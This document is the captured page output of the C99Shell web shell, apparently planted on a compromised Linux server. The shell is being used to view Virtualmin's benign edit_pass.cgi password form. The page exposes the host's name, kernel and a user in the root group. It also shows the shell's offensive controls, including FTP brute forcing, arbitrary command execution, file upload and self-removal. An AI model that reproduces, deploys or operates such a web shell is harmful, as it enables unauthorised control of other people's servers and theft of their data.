!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit_pass.cgi (1.2 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show a form for changing a domain's password

require './virtual-server-lib.pl';
&ReadParse();
if ($in{'dom'}) {
    $in{'dom'} || &error($text{'pass_ecannot2'});
    $d = &get_domain($in{'dom'});
    &can_passwd() && &can_edit_domain($d) || &error($text{'pass_ecannot'});
    }
elsif (!&reseller_admin() && !&extra_admin()) {
    &error($text{'pass_ecannot2'});
    }

&ui_print_header($d ? &domain_in($d) : undef, $text{'pass_title'}, "");

if ($d && &get_password_synced_types($d)) {
    print $text{'pass_dbsync'},"<p>\n";
    }

print &ui_form_start("save_pass.cgi", "post");
print &ui_hidden("dom", $in{'dom'}),"\n";
print &ui_table_start($d ? $text{'pass_header1'} : $text{'pass_header2'},
              undef, 2);

print &ui_table_row($text{'pass_new1'},
            &ui_password("new1", undef, 20));
print &ui_table_row($text{'pass_new2'},
            &ui_password("new2", undef, 20));

if ($d && $d->{'hashpass'} && &master_admin()) {
    print &ui_table_row($text{'pass_hashpass'},
                &ui_yesno_radio("hashpass", 1));
    }

print &ui_table_end();
print &ui_form_end([ [ "ok", $text{'pass_ok'} ] ]);

if ($d) {
    &ui_print_footer(&domain_footer_link($d),
             "", $text{'index_return'});
    }
else {
    &ui_print_footer("", $text{'index_return'});
    }


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0193 ]--